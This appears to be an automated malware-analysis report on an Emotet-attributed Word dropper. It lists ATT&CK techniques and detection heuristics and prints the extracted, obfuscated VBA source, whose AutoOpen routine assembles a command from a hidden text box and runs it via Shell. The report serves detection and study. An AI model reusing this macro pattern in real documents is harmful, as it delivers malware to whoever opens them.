Verdict: MALICIOUS
Risk Score: 292
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1059.001 PowerShell
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample contains VBA macros, including an autoopen macro, which is a common technique for Emotet. The macros utilize Shell() calls to execute cmd.exe and PowerShell, indicating an intent to download and execute a second-stage payload. The ClamAV detection further supports the Emotet family attribution.
Heuristics (10)
- ClamAV: Doc.Dropper.Emotet-6788101-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Emotet-6788101-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched lines in script:
    Set GPujbBBCrCDphAmMisl = hWjzTGkEVOBZfLXf
    jallcUPIk = Array(GwtcK, HApzPrPo, XrlSFG, Interaction.Shell(zChnzB, Tcodzqn), WdjqlqSoN)
    Select Case VvZohSwmhQbdLMBtRivIWDcs
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched lines in script:
    Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
    Sub autoopen()
    mmRbN
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10371 bytes |

SHA-256: 1498bff61f1bfb1db0db41543cc58f24c2b5603a725b33dfb154f0c5a50a10a9
Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 275 of 322 identifiers look randomly generated (e.g. 'QNZkTDlChipdVBfFkMTiFCAr'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "KUwUMcHHP"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
mmRbN
End Sub
Attribute VB_Name = "YYuVYzzVHw"
Function mmRbN()
On Error Resume Next
Select Case SYstsSdPHIwqVFzkDQqLwF
Case 152821297
fLaOSbtaroniZEvkYwUcT = SDJUdZkmqMBIOjs
wjOYwjSUKzVFnAkuQ = Log(tXFwwUqFwacRpOsJBnN)
HmkoJdDiwqcHrpnUKwiuhti = 290820307
tJGNiwwjVRHmQpUQMGIwVZA = YwDFTNODswPTwQUrfaW
Case 154263776
htJOiVmauWUJfpfvrNHD = 21288596
UZATvlQTvCdvqFtrorbdwav = Log(RbpvnMPTcnYjNKaB)
baRfkwaBAYQcZvu = 199537957
CTwVfinJSCjKdiRaUXzdih = Log(OtmozrDriEXIGEnvsiWR)
End Select
Set trXuwBEYuAKUqhcsuoROLBFF = KVjcHzIPhVCPtAqwTk
Select Case WAGpmBwrwEFTQdAjT
Case 170116054
VwWSRNYDfNTdijKK = LEcZiXtdhRUcvRJbhwRAio
NzRdcbbkGSLXPzmraco = Log(vEbjwJBwmsJGWbObMuQCF)
OJktuivFrXuEjJWhjTZi = 327047287
IEAniLifMlfOpRzD = XBhAmMSvFEfOzcajA
Case 7376187
sHwjbMLJYRTFhdECdQMW = 291008565
rcHwRPIEfpQTKHaSGobCt = Log(lwwltazTninKPTccuvAU)
ipNSwcKKXvpoNqIAjWiGM = 9356139
fArGpdtfCZsHJkSwzmIQj = Log(VCdTcOZRNZcEhREVVjdQnOUj)
End Select
Set QNZkTDlChipdVBfFkMTiFCAr = RbmTLHhuULBAhuVrBAnP
Select Case mJdiwQjpNkphCBtjENo
Case 42324059
UwtTlLWoPlQwORN = bmXUdUUozcsIlBbbYSSKkPM
KAzwZlojjqcaQmb = Log(iEVJTODOKpXvwC)
MZSJdWVPLoIbvYA = 67731980
qSjftDlwzjnkNskijQBwcw = JpJUKmHqKilEfWbSVjNf
Case 257698051
fzwXzMIwMJsoWpjiaJqsd = 35389717
nFHHzfRPSqbKLYnouiL = Log(cMrzminGDpuEZVISp)
KTutZwviXKnVvKS = 255290400
bOIVPsLMdwXlqQVwpXrXjnsE = Log(LcSiujlmVhEhjva)
End Select
Set jwBYthuRWFmaPQnVDOEPs = iMlwUiRRGcQnCqqfNdiB
Select Case VBrIIihiUQwKcvh
Case 115365462
zCNkUpblnACFPjIDfb = SjAEvaktNlhhWCOjIM
ALPWUifZEhoHwULzlz = Log(SKjwOAGTjCBzzrHaJCMfVQBj)
ZdkMKDcmKtNQOBVN = 96291847
WDhoQptCwYRbBJDkoWVGVzYM = zuJuBqSHRidikNvTIGEUis
Case 29412053
iMzrHdWiUATujHuh = 337683834
kiaGEJanNtTsFFpwQp = Log(aznIwJjtAjBLXVOIamXHpRU)
dKcuOFnqFpYVwWbzU = 106590186
ELhwWrwPJthCJiXinjp = Log(vvKGhwtLDLamYrQEwOFD)
End Select
Set pdzXmPqYrnQfkiIBa = awlLwSudROSiZalNF
Select Case jvpBFYWkzkwbtTIU
Case 145896709
EnnnASrbAVcfCTtskw = nwzwuKGvaisYWMwKiX
uWJiXBIRhfhBiMwiYHqtcuW = Log(zIzGSGJLVsBwiSavl)
YQsdKMXiXDrdPAzrhPECwbW = 146000045
qKAEFjvIkWGYUwlioiFU = cBzmlKritwuWwTBXZRWvUfi
Case 297278523
NQTTKtQBoOIASUVEZq = 166850565
CXijLOQiYWwXGTYt = Log(PjDiUIFtWHzArvpEhQp)
jIvchdRRkuzvcjKHVhhOZq = 270729105
TihbHSYCiHoGoaw = Log(rnIbIBYKkiizibMtToJzwqK)
End Select
Set WwNUsDSukrXmhNwRJ = qZkYTHuunARzuAcqFL
Select Case KlYwCimtbkZrujC
Case 145579765
sAsLjJfjbQpTTwiwmpjA = GXaDBjYcSdYBVKJq
abtPbNwaIlrtIrSVOmcSHidH = Log(InRRzoYIpOIHwfK)
dtuhiKmFjHYhYoswmKSa = 205069783
KzTkScKNPGSoioi = VwBMkqPqkBWJVoMjwUj
Case 324091057
wsJuSrRPjJDQMoTZ = 124720965
ThcARGBsbuiqJFlLXGr = Log(SzwaArSsIzsKfzPPl)
bCtZPXhtAwfARNhBFUjBzZnI = 238410625
BYKMpVaZfpXsjbtHrUN = Log(ifcdrvjjwBOlpnV)
End Select
Set inIJarhsdNkIHri = uctVwjUuprbibmCvFl
Const Tcodzqn = 0
Select Case UbRtVszTasVHSUZU
Case 16936467
oBwzwmTXVGsqrsYM = WdiajEHFsMdlAiGzrRI
VfiZwXsbjAdjFwDrU = Log(HzpuEaplUcltAbPzCqzIc)
LfVrjujDaPcIJLa = 176357690
EkMCPqqzCTItMsMFwlJ = MqvFRBWQsREXcOuYQGv
Case 271372605
rhaYJOWQCKZQBPNoHlOT = 167981509
kPkRwznprqUtUJV = Log(HnzzqGiGazhjIVhVFkwK)
sPZcMTjwIuETadaTZRikir = 337993788
EhWJwnjMKtPYaXdnv = Log(REdQhrHBjTSaIAQJ)
End Select
Set fwazUKrIjOBtCnqpUZu = nziBzHQuklOIRwwqVMztmI
Select Case cmjGljbhCJTNRoSPdimKi
Case 194543593
UpTtVqwmuNpwEEm = JTQzRpaYQnzjwIVwwjOQR
FqGWZzbrOLrucqSfofOuch = Log(MpmsqwXqVRTOZruQawZZosC)
fjSsiCWNXAtjmHktrVWd = 59208745
sotPowCICTnHMKfiHTu = qZzNdTLjiTWZWDn
Case 198306155
TNYLPzZtfuaOMNDiDkTqjlUm = 148516463
izOkIWBfoFVubbXTwYl = Log(VFTqTSUnShtmopOci)
mEMhZwMIJrSMnwAEEddXRqB = 91001985
HLjGmMvpDmjFnjVi = Log(JcUFtzlkklzHdvCw)
End Select
Set SmdCXfXXkJUzQwHtGj = tHNOzVBavhaqdGTOjAI
Select Case HWiIdsFkQlbmJDZKD
Case 54416427
TkMqdtCntLiSNmp = VmoWwCMZMazNLJNJAmJ
ujEObELZiTOATfEXPlJR = Log(ndDwobkwYRacKdoiZvt)
mqtLwtjFptOdsGHDBSmdbbJ = 9931606
XJBPpqqPblwjrzuuiIfCzk = WljGJQPLjsXZkf
Case 273142435
DYNRVLTKTriwSiwrnGfiJjhz = 77786503
PrTaKPpJbdjThKRWmRh = Log(tBtjmdALqTrNFvvbq)
jTGIDUHTZUMmwPStjOwnohP = 200297781
HmWOmPpftkOLkwYYSE = Log(wDXcvMOhdCFzDcpvilFn)
End Select
Set WHDiDhwPZOVdif = kKbBXiMdolKjuCpnM
Select Case bLiKiYwMGjrVbWwqB
Case 74633059
tYkIEsqjRoSZGnIWACpKLGP = ziVAujITKLmrqC
RophYoHliSAwoMAjnIjJ = Log(WpohjwOvBQfzYXVWYr)
rznitnTGJbwiKtIuz = 1963937
rpsqhBUwPpiNOR = RYjHvuMsFTCiVEQcW
Case 145490556
zawHGjYoDRiOjRtcjLs = 32738468
fznWiTzuzMIqqRq = Log(RcaWFJaaESRbchQiR)
UcKkbMZuEFWXtzDJR = 228086027
iAVXNSLCXSSviZXwO = Log(hBNzKFVDjZRYSPi)
End Select
Set iRwEzSPKBclJszVD = BkhDlqQCJlmlwzCNRrFzJK
zChnzB = KUwUMcHHP.TextBox1 + wUzriSR + jWVwZLYJ + WKdOtt + NjbIL + TPMjW + IpEPpm + RdJBFRSF + jQEUMbKN
Select Case nGfdXzdPtJwlAZwp
Case 258790768
uzJWRwpjJHclBWP = UrGQbnlnJKibSMFYaIoqERp
onnWnIHcWJFFiWfGLWMHQ = Log(QzBDKtiZmCBYcnAP)
ACGFIGApDdiiiEiRaWqUjzNt = 323041020
DDJurGvWMEKHIqAOGQ = uEzTHBQJvPDoMI
Case 252868213
zfJlbjLsdHTOzT = 139683941
ztCSFjCtbwAGIPzzVnDizfY = Log(sEqAiBJbuMrSFUwN)
QJiiEkNJUtMPmtSVrZAt = 12999991
amYMvYftBoqFhVtc = Log(UcqOHzLITZwNvwTbEjrJso)
End Select
Set iasXZhLwbPkfRLzSpMEbzi = GqWdcmBSwjnMnPZmaIcV
Select Case riWZTvCVTYRwOlVKtTiO
Case 275849281
kqOoaajfjhQYYsG = DRiaEuvWGOAzadjioiwfLiV
pnskhqMdDzQQkPEpvrh = Log(aiFCwmkqubiYwBkR)
KpQBXuaNSuYdIk = 130137268
JCHhpmuGWicQrTifnnkCRJCn = pfsLMmqOcnzdjNYuKfoS
Case 64130995
zLtqVARfzzTCAGCuJw = 247960291
PjiBDZLHHiOVVS = Log(jSWQqzwnAKhMRsPWrjHH)
crmvoJYVkwjhaVcmf = 311372373
StirVNtOrHWoNL = Log(DajUBnYRPLBfrXmj)
End Select
Set lDoZtARiuujNOJSW = RCCKtRtbTfUhCrFX
Select Case VkiBPcALFEkDoqWsOMhZbRQ
Case 174593082
tWUBYYQiqUEimMAE = oLKBOmTHzQMATDTHo
FjKjjUVwVSOcAhVLcF = Log(LfkAtYHDiXRkWwqvY)
HfpjPQAtXQfiHaO = 289326083
qUfRIYRnbEisiJmzGVZa = PUzzBqYDPqWiVzasnzGY
Case 300390210
MSBtGthBFoRwbAfRGitjMO = 77920856
IKMESVTBlaHhwHjiV = Log(khMXXZMWsYfJcwGnk)
hcikVPNAtwTwwOOzdiBlmmsw = 188485491
WbwJaLXnztfAMwKWjNCuZRv = Log(UclzJuklHatlCjYHbKQV)
End Select
Set dRFaQGitiVEfUpzaX = DIusmCYUwovSPBaMrLjZ
Select Case kKqWiuobslvDIJMQsrEz
Case 261515677
JzIwSTwUsFdvLpqGt = azKAqbYcFQnwIlqTBrOjb
iYsqaNwWZlzUXqGIJj = Log(pNjhuwrErozsNJESmIA)
LiiqBAoOzMshhG = 248239695
wqztiIGhZtjLSYU = IiOKipfuHdFiwR
Case 72496067
XwUvKGTDYARIQdv = 179275735
rZCradILDmECblHicnVDYqB = Log(LmiXXdihimFsIPwT)
kHUOAzPKZopaXUBY = 287899678
owknZIWYpjOaMrBroijw = Log(oONzpoHGRDUQkIUb)
End Select
Set hMrcIjvzbwYffSrvUzkXqkTP = XcuJcjhQrBTEijfRz
Select Case cSqXBQnzYzwGAjAMXhVJBzdk
Case 259250194
brJwlESAFLKGIFpHU = bIOmrKZuuoucoGkmov
aOtnzbpCRZPTuiKJfBpAzY = Log(JiGcWEWVQuRuFhVOLBIIViV)
wiwEkzvqBXkIsz = 129914604
uDzZckEbKndwrQViIGirHRkQ = ashzMVMhJNRfvXNZVuzVzzkB
Case 35567793
mUcqcSiaBrXdwR = 116543744
hDDzMiQRmXmvBbIfs = Log(jrFTkzwVWWCrwjDj)
hwGnDELEFfnZajrlm = 225638126
LOSDCrMtOvaGrUIahmY = Log(muOfUJvwnLFKwdVEPuDv)
End Select
Set KwJiYvERIJzNCnRzmjtwQGC = QIOzEKnidpbzFAvNriiBGz
Select Case kZYlUqJLZbpjEVlOpQNw
Case 314073722
IEwHzcFMtaGsMbTRGzu = iYkXYOmYjlJWhJQUnNtjFMhO
MJKuXJOBAsjUbiipjdIQ = Log(KCKzitFNpWrVuMEcdMbvU)
QjAMiLrYjZwsBGzutQJoK = 149088213
wjWdNCQhVPdldzSOuWQmSXB = wcjTKmjWuoBfIhiW
Case 122328119
cdXUVvbCOStjabfLfkTzWjj = 46353166
pzmGNruUauYndHnrHXOcKOZ = Log(wBuCVUttQcjwow)
azPzhGYCdjFPLV = 198155427
bXmJLzszFAfWAaoDLVndv = Log(suYzQVPFhYmvFaCmq)
End Select
Set GPujbBBCrCDphAmMisl = hWjzTGkEVOBZfLXf
jallcUPIk = Array(GwtcK, HApzPrPo, XrlSFG, Interaction.Shell(zChnzB, Tcodzqn), WdjqlqSoN)
Select Case VvZohSwmhQbdLMBtRivIWDcs
Case 89794693
KVjnptLwfDUDwL = LwBTUqzHUwVSjZSSjaiHaFta
RNjwZNjkLKFbZtLKOLqUa = Log(YNkocUDWGEalCdSJvili)
PMrHhSwMtCGHooTNklP = 216657469
EAAnqisFQIirEJAsjvBGJM = UiNowvLzVBiKLr
Case 131802980
kEHduXPkfTVDpOafrzfJctt = 65644128
KMqVwoBMERBCiHz = Log(dJfZHHHbDTMLKOqLz)
jKZOjiTrlzYcJriuwjN = 237420918
CFOSfbqBqapFKXmpPcAGQWKC = Log(KVcQPHwNahFKwBDdpuW)
End Select
Set XwUvFjHNihjuMqVGNlbSr = jqhiTazcabnTDLAjLjzljsA
Select Case ofnWNLjkRQXiLf
Case 27309708
HiGcmzJuHIOQTwGdRMHoLtUq = EdljhljJZZHdfQ
VtOFwTRTJtMwXPlNNQaiUYN = Log(XfGtYwzmvRTRiPtimJb)
VmLuoLuNEiWzfpiRMXuLua = 19134334
wTizWrvKwbEkTMF = EmhNuVlphcVPPQsu
Case 233394295
wVczqNnLAEkzzA = 122094637
GIspLahtPuWjvjjKBPOjj = Log(vUZiUhFkfVwjJjC)
sXnjhvrHQUVawiliwzMYPdF = 210595
fPAjOXzHHWqwzZzdSSALfo = Log(jNhJXddPRnwBjqYBwWSoLvmz)
End Select
Set MuzKEoHrRRVjObidGYI = YSnuQEpNzlobij
End Function